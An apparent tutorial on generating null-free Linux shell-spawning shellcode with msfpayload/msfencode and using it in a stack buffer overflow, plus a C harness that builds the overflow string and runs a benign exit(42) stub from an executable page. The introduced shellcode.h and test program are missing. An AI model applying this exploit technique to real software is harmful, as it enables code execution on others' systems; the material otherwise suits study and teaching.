Here’s a quick one-liner to make Linux shellcode that runs exec("/bin/bash"). The last argument to msfencode, -t c, tells it to emit the encoded bytes as a C array.
msfpayload generates the raw shellcode that exec()s a shell on Linux, and msfencode re-encodes it so that the output contains no \x00 (null) bytes and no \xff bytes; those are the "bad characters" given to msfencode with -b '\x00\xff'. Nulls matter because the payload is delivered through argv and a string copy, both of which stop at the first null byte.
This is shellcode.h:
We can test it with this simple C program:
When run normally, the program takes a single command-line argument as input and prints the address of the shellcode buffer. (This is a contrived example.)
So now all we have to do is overflow the buffer and overwrite the saved return address with the address of the shellcode, written with its bytes reversed because x86 is little-endian. The same null-byte constraint applies to that address as to the shellcode: since it travels through argv, it cannot contain a \x00 byte.
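As an added example (not the post's shellcode.h or its test program, and not msfpayload/msfencode output), here is a small C harness showing the pieces this test depends on: a bad-byte check of the kind msfencode's -b option is meant to satisfy, little-endian packing of the shellcode address into the overflow string, and an mmap-based launcher that copies shellcode into an executable page and jumps to it. The shellcode bytes are a constructed 32-bit Linux exit(42) stub chosen to contain no \x00 or \xff; the padding length 20 and the address 0xbffff6c0 are hypothetical values standing in for the offset to the saved return address and the address the vulnerable program prints.

```c
#define _DEFAULT_SOURCE 1 /* for MAP_ANONYMOUS on glibc */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

/* Constructed placeholder shellcode, NOT msfpayload/msfencode output:
 * a 32-bit Linux exit(42) stub written without \x00 or \xff bytes.
 *   31 db   xor ebx, ebx
 *   b3 2a   mov bl, 42      ; exit status
 *   31 c0   xor eax, eax
 *   b0 01   mov al, 1       ; SYS_exit
 *   cd 80   int 0x80
 */
static const unsigned char shellcode[] =
    "\x31\xdb\xb3\x2a\x31\xc0\xb0\x01\xcd\x80";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Bad characters for an argv/strcpy-delivered payload: the same list
 * one would hand to msfencode -b '\x00\xff'. */
static const unsigned char bad_chars[] = { 0x00, 0xff };

/* Return the offset of the first byte of buf that is in bad, or -1 if
 * none is present.  Run this on the encoder's output before trusting it. */
int find_bad_byte(const unsigned char *buf, size_t len,
                  const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (int)i;
    return -1;
}

/* Store a 32-bit address least-significant byte first, which is the
 * byte order a little-endian x86 target reads back from the stack. */
void pack_le32(uint32_t addr, unsigned char out[4])
{
    out[0] = (unsigned char)(addr & 0xffu);
    out[1] = (unsigned char)((addr >> 8) & 0xffu);
    out[2] = (unsigned char)((addr >> 16) & 0xffu);
    out[3] = (unsigned char)((addr >> 24) & 0xffu);
}

/* Build the overflow string: `padding` filler bytes up to the saved return
 * address, then the shellcode address in little-endian order, then a NUL so
 * the result can be passed as argv[1].  Returns the payload length
 * (excluding the NUL), -1 if out is too small, or -2 if the address itself
 * contains a NUL, which argv/strcpy would truncate. */
int build_payload(size_t padding, uint32_t shellcode_addr,
                  unsigned char *out, size_t outlen)
{
    if (outlen < padding + 4 + 1)
        return -1;
    memset(out, 'A', padding);
    pack_le32(shellcode_addr, out + padding);
    if (find_bad_byte(out + padding, 4, bad_chars, 1) >= 0) /* NUL only */
        return -2;
    out[padding + 4] = '\0';
    return (int)(padding + 4);
}

/* Copy the shellcode into a fresh RWX anonymous mapping and call it.
 * Only main() uses this: a real exec("/bin/sh") payload replaces the
 * process, and the placeholder stub exits it with status 42. */
void run_shellcode(const unsigned char *code, size_t len)
{
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        exit(1);
    }
    memcpy(mem, code, len);
    ((void (*)(void))mem)();
}

int main(void)
{
    unsigned char payload[64];
    int n, off;

    off = find_bad_byte(shellcode, SHELLCODE_LEN, bad_chars, sizeof bad_chars);
    if (off >= 0) {
        fprintf(stderr, "bad byte 0x%02x at offset %d\n", shellcode[off], off);
        return 1;
    }

    /* Hypothetical values: 20 bytes to the saved return address and a
     * shellcode address of 0xbffff6c0, standing in for what the vulnerable
     * test program reports. */
    n = build_payload(20, 0xbffff6c0u, payload, sizeof payload);
    printf("payload (%d bytes): ", n);
    for (int i = 0; i < n; i++)
        printf("\\x%02x", payload[i]);
    printf("\n");

    run_shellcode(shellcode, SHELLCODE_LEN); /* process exits with status 42 */
    return 0;
}
```

The bad-byte scan is what you should run against whatever the encoder actually emitted, since an encoder that missed a null gives you a payload that silently truncates at strcpy. Note that build_payload only rejects a NUL in the address, not \xff: the encoder's bad-character list applies to the shellcode bytes, while stack addresses such as 0xbffff6c0 routinely contain \xff and are still fine to pass through argv.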